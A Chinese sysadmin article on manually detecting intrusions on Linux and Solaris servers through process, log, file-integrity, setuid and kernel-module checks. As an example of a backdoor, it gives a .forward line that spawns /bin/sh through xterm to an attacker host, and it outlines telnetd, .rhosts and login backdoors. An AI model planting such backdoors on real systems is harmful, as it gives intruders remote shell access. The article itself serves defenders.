解析Linux如何判断自己的服务器是否被入侵的检测方法

马哥Linux运维 2018-01-13 10:27 次阅读

如何判断自己的服务器是否被入侵了呢?仅仅靠两只手是不够的,但两只手也能起到一些作用,我们先来看看UNIX系统上一些入侵检测方法,以LINUX和solaris为例。

1、检查系统密码文件

首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。

解析Linux如何判断自己的服务器是否被入侵的检测方法

顺便再检查一下系统里有没有空口令帐户:

2、查看一下进程,看看有没有奇怪的进程

重点查看进程:

ps –aef | grep inetd

inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。

输入netstat –rn,查看本机的路由、网关设置是否正确。

输入 ifconfig –a,查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:

find / -name “.rhosts” –print 

find / -name “.forward” –print 

在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh" 

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:

ln -s /var/mail/luser ~/.forward 

然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中。直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。

UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :

UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?

说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。

另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

10、手工入侵检测的缺陷

上面谈了一些手工入侵检测的方法,但这些方式有一定的缺陷,有的甚至是不可避免的缺陷,这就是为什么说手工检测是“体力活”的原因。我们先来看看这些缺陷:

1)手工入侵检测只能基于主机,也就是说所有的入侵检测工作只能在操作系统下面完成,这是它固有的缺陷;基本上所有凌驾于操作系统之外的入侵行为统统无法探测得到。网络级的入侵,交换机、路由器上面的入侵和攻击行为,作为服务器的操作系统都无法得知;信息已经从主机发送出去了,如果在传送的介质当中被拦截,主机的操作系统是永远无动于衷的。

2)手工的入侵检测要求精通操作系统,并且漏洞库资料的刷新要快;在做一个网管的同时要做一个黑客。可以说经验的积累永远跟不上全世界漏洞资料的更新,难保系统不被新的漏洞所侵入。

3)手工入侵检测只是“就事论事”,根据发生的某一情况判断入侵事件,再作出相应的对应和防范措施,而无法预先根据入侵者的探测行为作出对攻击事件的描述,定义事件级别,在不防碍系统正常工作的情况下阻止下一步对系统的入侵行为。

4)可以通过手工入侵检测发现主机上的某些漏洞,进而作出相应的安全措施。但却避免不了一种现象:无法避免两个入侵者利用同一个漏洞攻击主机,即无法判断攻击模式来切断入侵行为。

5)综上所述,手工的入侵检测行为对于系统安全来说只是治标而不治本,多半还是依靠管理员的技巧和经验来增强系统的安全性,没有,也不可能形成真正的安全体系,虽然聊胜于无,可以检测和追踪到某些入侵行为,但如果碰上同样精通系统的入侵者就很难抓住踪迹了。

11、入侵检测系统的比较

搭建真正的安全体系需要入侵检测系统—IDS,一个优秀的入侵检测系统辅以系统管理员的技巧和经验可以形成真正的安全体系,有效判断和切断入侵行为,真正保护主机、资料。人们有时候会以为ISS的realsecure是优秀的入侵检测系统,其实不然,realsecure带有一定的缺陷,不谈它对事件的误报、漏报和错报,首先它是一个英文的软件,使用和熟悉起来有一定的难度。而且由于是外国人的软件,很多hack对realsecure有深入的研究,已经发掘出它的一些漏洞,甚至是固有漏洞,我就曾经测试出有的攻击手段可以令realsecure瘫痪。

再者,realsecure也是架设在服务器操作系统之上的,操作系统停止工作,同样令之停止工作,换句话说,很简单,攻击者攻击的目标往往就是realsecure本身。设想,假设你的系统依赖于入侵检测系统,而入侵检测系统被攻击者搞掉,那你的系统将大门敞开,任由出入,后果不堪设想。

原文标题:Linux如何判断自己的服务器是否被入侵

文章出处:【微信号:magedu-Linux,微信公众号:马哥Linux运维】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
分享:

评论

相关推荐

UNIX网络编程教程之UNIX网络编程第1卷电子教材免费下载

本书是一部UNIX网络编程的经典之作。书中全面深入地介绍了如何使用套接字API进行网络编程。全书不但....

发表于 10-16 16:56 11次 阅读
UNIX网络编程教程之UNIX网络编程第1卷电子教材免费下载

伽利略的LINUX SD映像问题

你好!你好吗? 我需要你的帮助。 我对galileo的LINUX SD映像有问题。 当我有micro sd卡时,我的电脑没有阅读intel ga...

发表于 10-16 16:19 17次 阅读
伽利略的LINUX SD映像问题

Linux嵌入式系统初学者的常见问题解决方法大全

该文档为Linux嵌入式系统初学者的常见问题解决方法大全(Linux学习指引篇)讲解文档,是一份不错的参考资料,感兴趣的可以下载看...

发表于 10-16 16:12 66次 阅读
Linux嵌入式系统初学者的常见问题解决方法大全

如何使用Quad-core for SmartXplorer for Linux

我试图运行ISE v14.2 SmartXploreron四核(Q6600)linux机器,但在运行SmartXplorer时,只运行一个策略,这与在Intel i...

发表于 10-16 16:05 8次 阅读
如何使用Quad-core for SmartXplorer for Linux

嵌入式Linux系统开发教程及案例分析(配套PPT)

本文主要介绍了嵌入式Linux系统开发教程及案例分析。 ...

发表于 10-16 15:52 139次 阅读
嵌入式Linux系统开发教程及案例分析(配套PPT)

成为嵌入式Linux工程师需要懂什么?

随着嵌入式行业的迅猛发展,嵌入式Linux凭借其系统发展的成熟度、市场应用的高份额也受到更多工程师朋友的青睐,越来越多的企业...

发表于 10-16 15:32 92次 阅读
成为嵌入式Linux工程师需要懂什么?

精选Linux入门教材之设备驱动程序+内核设计与实现

     《Linux入门教材之Linux设备驱动程序第三版》指导你如何编写你自己的驱动, 以及如何利用内核相关的...

发表于 10-16 15:29 128次 阅读
精选Linux入门教材之设备驱动程序+内核设计与实现

《Linux+树莓派玩转智能家居》(第2版)

《Linux+树莓派玩转智能家居(第2版)》的主旨在于利用Raspberry Pi完成“家居智能化”的目标。《Linux+树莓派玩转智...

发表于 10-16 15:15 164次 阅读
《Linux+树莓派玩转智能家居》(第2版)

10个方便的Bash别名

要使用你创建的 Bash 别名,你需要将其添加到 .bash_profile 中,该文件位于你的家目....

的头像 Linux爱好者 发表于 10-16 15:00 78次 阅读
10个方便的Bash别名

Linux图形界面的原理与构成和Linux命令行和vi编辑器的使用手册

本文档的主要内容详细介绍的是Linux基础教案主要内容是:(1) 了解Linux图形界面的原理与构成....

发表于 10-16 14:49 10次 阅读
Linux图形界面的原理与构成和Linux命令行和vi编辑器的使用手册

Linux入门教材之Linux设备驱动程序第三版电子教材免费下载

以 Linux 为代表的自由操作系统的很多优点之一, 是它们的内部是开放给所有人看的。 操作系统, ....

发表于 10-16 14:27 14次 阅读
Linux入门教材之Linux设备驱动程序第三版电子教材免费下载

在控制台UI模式下安装WICED_Studio_installer.bin不起作用

大家好, 我试图在运行在AWS EC2实例上的詹金斯服务器上构建代码。为了安装WICE安装程序,我遵循了链接WICE Stud...

发表于 10-16 09:53 36次 阅读
在控制台UI模式下安装WICED_Studio_installer.bin不起作用

Enterprise 3.3.153更新服务器属性都消失了

更新我的软件,希望使用AD集成...... web gui是相同的,没有可用的广告功能......但是数据库中有一些广告项...... ...任何帮助...

发表于 10-16 08:38 12次 阅读
Enterprise 3.3.153更新服务器属性都消失了

Berkeley TCP Client演示无法连接到PC上的服务器

我使用PIC32以太网启动器套件2和Belkely-TCPP-客户端MPLAB和谐示例应用程序来连接我的PC上的服务器应用程序:IP...

发表于 10-16 07:29 9次 阅读
Berkeley TCP Client演示无法连接到PC上的服务器

操作系统是什么?Linux操作系统的原理与应用资料概述

认识操作系统-从使用者的角度看打开计算机,首先跳入眼帘的是什么?要拷贝一个文件,具体的拷贝操作是谁完....

发表于 10-15 18:20 10次 阅读
操作系统是什么?Linux操作系统的原理与应用资料概述

linux内核入门教材之linux内核设计与实现第二版中文版免费下载

此书是当今首屈一指的linux内核入门最佳图书。作者是为2.6内核加入了抢占的人,对调度部分非常精通....

发表于 10-15 18:20 16次 阅读
linux内核入门教材之linux内核设计与实现第二版中文版免费下载

Linux和C语言教程之Linux C编程一站式学习教材免费下载

本书最初是为北京亚嵌教育研究中心的嵌入式Linux系统工程师就业班课程量身定做的教材之一。该课程是为....

发表于 10-15 17:45 14次 阅读
Linux和C语言教程之Linux C编程一站式学习教材免费下载

若忘记了Linux系统的root密码,该怎么办?

很多朋友经常会忘记Linux系统的root密码,linux系统忘记root密码的情况该怎么办呢?

的头像 嵌入式ARM 发表于 10-15 16:49 116次 阅读
若忘记了Linux系统的root密码,该怎么办?

微软宣布加入一个为保护Linux免于诉讼而设立的开源专利组织

事实上,Azure客户广泛使用Linux,微软也在Windows之外,向Linux提供SQL Ser....

的头像 科技美学 发表于 10-15 14:48 513次 阅读
微软宣布加入一个为保护Linux免于诉讼而设立的开源专利组织

嵌入式Linux C的基本知识点详解

嵌入式系统专业是综合了计算机硬件技术、计算机软件技术以及电子电路技术的一门综合学科,所涉及的内涵和知....

的头像 嵌入式ARM 发表于 10-15 09:20 397次 阅读
嵌入式Linux C的基本知识点详解

资深linux运维工程师的工作经验分享

本人是linux运维工程师,对这方面有点心得,现在我说说要掌握哪方面的工具吧

的头像 工程师人生 发表于 10-15 09:20 167次 阅读
资深linux运维工程师的工作经验分享

无线通信技术在智能电网主要有哪些应用

智能电网简单来说,就是电力网络和信息技术的结合,采集电网各种数字化传感器的实时数据,结合电力设备的资....

发表于 10-14 13:39 98次 阅读
无线通信技术在智能电网主要有哪些应用

Linux磁盘管理好坏或有什么影响

df命令参数功能:检查文件系统的磁盘空间占用情况。可以利用该命令来获取硬盘被占用了多少空间,目前还剩....

的头像 嵌入式ARM 发表于 10-14 09:52 165次 阅读
Linux磁盘管理好坏或有什么影响

iBASE发布全球首款嵌入式处理器准系统网络服务器

服务器大厂iBASE近日发布了全球首款基于AMD EPYC嵌入式处理器的机架式准系统网络服务器“FW....

发表于 10-13 09:46 104次 阅读
iBASE发布全球首款嵌入式处理器准系统网络服务器

Linux中有哪些常见的文件类型?

本文档的主要内容详细介绍的是Linux中有哪些常见的文件类型?

发表于 10-12 18:02 33次 阅读
Linux中有哪些常见的文件类型?

Linux系统vi(vim)编辑器命令使用教程

vi(vim)是上Linux非常常用的代码编辑器,很多Linux发行版都默认安装了vi(vim)。v....

的头像 机器人在线订阅号 发表于 10-12 16:53 267次 阅读
Linux系统vi(vim)编辑器命令使用教程

如何进行单片机的安装详细方法电路图和程序资料免费下载

单片机技术自发展以来已走过了近20年的发展路程 。单片机技术的发展以微处理器(MPU)技术及超大规模....

发表于 10-12 16:44 46次 阅读
如何进行单片机的安装详细方法电路图和程序资料免费下载

客户机和服务器的程序及生成文件的详细资料免费下载

本文档的主要内容详细介绍的是客户机和服务器的程序及生成文件的详细资料免费下载。

发表于 10-12 14:43 22次 阅读
客户机和服务器的程序及生成文件的详细资料免费下载

大数据的学习中你需要掌握的十二大技术

大数据是对海量数据进行存储、计算、统计、分析处理的一系列处理手段,处理的数据量通常是TB级,甚至是P....

发表于 10-11 17:46 152次 阅读
大数据的学习中你需要掌握的十二大技术

你应该知道的27个Linux文档编辑命令

在许多UNIX说明文件里,都有RLF控制字符。当我们运用shell特殊字符">"和">>",把说明文....

的头像 马哥Linux运维 发表于 10-11 16:43 187次 阅读
你应该知道的27个Linux文档编辑命令

硬件植入是非常高端的间谍技术

Appleboum 分析,这家美国电信公司的服务器在中国制造工厂被窜改,美国情报局判断是在中国广州的....

的头像 满天芯 发表于 10-11 16:13 458次 阅读
硬件植入是非常高端的间谍技术

“间谍芯片”栽赃中国的真正用意!

菲茨帕特里克说,那是在去年的“DefCon全球黑客大会”上,当时他准备在会上演讲的主题正是“硬件入侵....

的头像 半导体行业联盟 发表于 10-11 14:45 709次 阅读
“间谍芯片”栽赃中国的真正用意!

符合汽车级要求的Linux系统,AGL呼之欲出!

Linux是一个操作系统,类似于大家常见的Windows、Mac OS,区别于后者主要在于Linux....

的头像 高工智能汽车 发表于 10-11 10:01 354次 阅读
符合汽车级要求的Linux系统,AGL呼之欲出!

我们可能正处于一场真正的协作革命的边缘

人更改了文档--并生成了一个事件。有人发了电子邮件,另一个事件出现了。换一个日历,甚至可能打个电话-....

的头像 CTI论坛 发表于 10-10 17:42 625次 阅读
我们可能正处于一场真正的协作革命的边缘

Linux常用命令的全拼整理

本文整理了常用命令的全拼,好像混进了什么奇怪的东西。

的头像 Linux爱好者 发表于 10-10 17:19 447次 阅读
Linux常用命令的全拼整理

为什么大部分手机供应商都不更新Linux内核?

相比消费者级的电子产品,企业级Linux系统供应商通常会及时更新内核。

的头像 嵌入式资讯精选 发表于 10-10 15:53 194次 阅读
为什么大部分手机供应商都不更新Linux内核?

小白都能看懂的NAS服务器搭建教程

NAS即网络附加存储(Network Attached Storage),通过网络提供数据访问服务。

的头像 马哥Linux运维 发表于 10-10 14:50 271次 阅读
小白都能看懂的NAS服务器搭建教程

“间谍芯片门”如同蝴蝶效应的翅膀已扇动,对全球科技产业可能产生哪些影响?

台湾地区国防部参谋本部资通电军指挥官马英汉在接受金融时报采访时表示,在当代的电子制造产业中,芯片及其....

的头像 半导体投资联盟 发表于 10-10 11:52 1005次 阅读
“间谍芯片门”如同蝴蝶效应的翅膀已扇动,对全球科技产业可能产生哪些影响?

在Linux上如何配置基于密钥认证的SSH?

众所周知,Secure Shell,又称 SSH,是允许你通过无安全网络(例如 Internet)和....

的头像 嵌入式资讯精选 发表于 10-09 17:28 171次 阅读
在Linux上如何配置基于密钥认证的SSH?

“间谍芯片门”冲击,全球科技股哀鸿一片

The Motley Fool的技术和消费品专家Leo Sun表示,围绕Super Micro的争议....

的头像 半导体投资联盟 发表于 10-09 11:50 1184次 阅读
“间谍芯片门”冲击,全球科技股哀鸿一片

联想服务器业务快速增长,华为在服务器市场的份额排名有所下滑

联想在服务器市场的发展延续了它在PC市场的收购模式,2014年9月它收购收购IBM的x86服务器业务....

的头像 柏颖漫谈 发表于 10-09 08:51 1192次 阅读
联想服务器业务快速增长,华为在服务器市场的份额排名有所下滑

全美多家顶级科技公司,都被一枚不到铅笔尖大小的中国芯片黑了!

超微电脑创办于美国,创始人为台湾华裔,主板组装工厂大部分位于中国大陆,自己工厂做不过来时会分包给代工....

的头像 电子发烧友网工程师 发表于 10-08 14:18 1031次 阅读
全美多家顶级科技公司,都被一枚不到铅笔尖大小的中国芯片黑了!

AMD快速进步导致Intel陷入窘境,Intel面临该保利润还是份额的抉择

AMD在过去几年可谓是最难熬的几年,为了研发先进的Zen架构它甚至不得不将办公楼出售以筹集资金,可喜....

的头像 柏颖漫谈 发表于 10-08 08:40 389次 阅读
AMD快速进步导致Intel陷入窘境,Intel面临该保利润还是份额的抉择

PESD2CAN ESD保护管的详细数据手册免费下载

本文档的主要内容详细介绍的是PESD2CAN ESD保护二极管的详细数据手册免费下载。

发表于 10-08 08:00 39次 阅读
PESD2CAN ESD保护管的详细数据手册免费下载

linux常用命令缩写和全拼资料免费下载

pwd:print work directory 打印当前目录 显示出当前工作目录的绝对路径 ps....

的头像 马哥Linux运维 发表于 10-03 10:58 376次 阅读
linux常用命令缩写和全拼资料免费下载

可用于管理进程的整个生命周期的八个Linux命令

一般来说,应用程序进程的生命周期有三种主要状态:启动、运行和停止。如果我们想成为称职的管理员,每个状....

的头像 嵌入式资讯精选 发表于 10-02 17:22 471次 阅读
可用于管理进程的整个生命周期的八个Linux命令

2018年受到众多开发者关注的7个Python类库

几个还不太知名的库引起了Python开发者的关注。

的头像 马哥Linux运维 发表于 10-02 09:30 374次 阅读
2018年受到众多开发者关注的7个Python类库

ACL是什么?ACL有什么用?

常见的文件操作命令 cp 和 mv 等都支持 ACL 权限,只是 cp 命令需要加上 -p 参数。但....

的头像 Linux爱好者 发表于 09-30 16:52 280次 阅读
ACL是什么?ACL有什么用?

Linux引发争议,贡献者能否删除上传的代码?

多位贡献者和社区成员对 COC 进行批判和反对,甚至有人在邮件列表发起了撤销贡献代码的讨论。

的头像 Linux爱好者 发表于 09-30 14:46 222次 阅读
Linux引发争议,贡献者能否删除上传的代码?

Linus Torvalds宣布暂时退出Linux内核的维护进程

“专注于技术的优势在于你可以拥有一些主要的客观衡量标准,这样一些共识才有可能达成,而社区也会非常健康....

的头像 Linux爱好者 发表于 09-30 09:05 260次 阅读
Linus Torvalds宣布暂时退出Linux内核的维护进程

Linux实用教程之Linux文件和目录操作总结

在Linux系统下除了一般文件之外,所有的目录和设备(光驱、硬盘等)都是以文件的形式存在的,本节主要....

发表于 09-29 16:18 65次 阅读
Linux实用教程之Linux文件和目录操作总结

Intel发布服务器路线图 10nm又被往后挤了一段

先进的制造工艺曾经是Intel最强有力的武器,结果到了14nm上出现严重不顺,10nm更是前所未有地....

发表于 09-29 15:37 176次 阅读
Intel发布服务器路线图 10nm又被往后挤了一段

你想知道的Ocaml语言

关于OCaml,最早称为Objective Caml,是Caml编程语言的主要实现,开发工具包含交互....

发表于 09-29 14:23 113次 阅读
你想知道的Ocaml语言

戴尔采用区块链、人工智能等技术来保持该公司服务器在印度市场的领先地位

据印度日报《经济时报》报道,戴尔EMC高级董事兼总经理曼尼什·古普塔表示:“客户希望利用这些技术,让....

发表于 09-29 11:48 368次 阅读
戴尔采用区块链、人工智能等技术来保持该公司服务器在印度市场的领先地位

报告:美国国土安全部无人机数据易受黑客攻击和内部威胁

在美国国土安全部监察长办公室的一份报告中公布,海关与边境保护局(CBP)未能采取适当的保障措施来保。....

的头像 E安全 发表于 09-29 10:21 1901次 阅读
报告:美国国土安全部无人机数据易受黑客攻击和内部威胁

基于ARM的嵌入式Linux系统开发技术详解(完整版)电子教材免费下载

以嵌入式Linux 系统开发流程为主线,剖析了嵌入式Linux 系统构建的各个环节。从嵌入式系统基础....

发表于 09-29 08:00 94次 阅读
基于ARM的嵌入式Linux系统开发技术详解(完整版)电子教材免费下载

Marvell光纤通道和以太网解决方案现已通过业内最先进的模块化服务器面向市场

Marvell今日宣布其品类丰富的下一代 10/25GbE FastLinQ®以太网和 QLogic....

的头像 人间烟火123 发表于 09-28 17:31 1391次 阅读
Marvell光纤通道和以太网解决方案现已通过业内最先进的模块化服务器面向市场

2018年已有价值8.54亿美元的加密货币被盗

针对美国可能出台的联邦数据管制,谷歌提出制定一系列公司政策并任命一直以来的隐私顾问基思·恩利特担任首....

的头像 E安全 发表于 09-28 15:34 357次 阅读
2018年已有价值8.54亿美元的加密货币被盗

如何扩展您的Tableau环境

您的成本会随着服务规模增长。不久之后,许可证和维护成本会非常显眼,并引起公司众多财务人员的警觉。竞争....

的头像 Tableau社区 发表于 09-28 15:15 321次 阅读
如何扩展您的Tableau环境

AM4379 AM437x ARM Cortex-A9 微处理器 (MPU)

TI AM437x高性能处理器基于ARM Cortex-A9内核。 这些处理器通过3D图形加速得到增强,可实现丰富的图形用户界面,还配备了协处理器,用于进行确定性实时处理(包括EtherCAT,PROFIBUS,EnDat等工业通信协议)。该器件支持高级操作系统(HLOS)。基于Linux的® 可从TI免费获取。其它HLOS可从TI的设计网络和生态系统合作伙伴处获取。 这些器件支持对采用较低性能ARM内核的系统升级,并提供更新外设,包括QSPI-NOR和LPDDR2等存储器选项。 这些处理器包含功能方框图中显示的子系统,并且后跟相应的“说明”中添加了更多信息说明。 处理器子系统基于ARM Cortex-A9内核,PowerVR SGX™图形加速器子系统提供3D图形加速功能以支持显示和高级用户界面。 可编程实时单元子系统和工业通信子系统(PRU-ICSS与ARM内核分离,允许单独操作和计时,以实现更高的效率和灵活性.PRU-ICSS支持更多外设接口和EtherCAT,PROFINET,EtherNet /IP,PROFIBUS,以太网Powerlink,Sercos,EnDat等...

发表于 09-25 11:51 18次 阅读
AM4379 AM437x ARM Cortex-A9 微处理器 (MPU)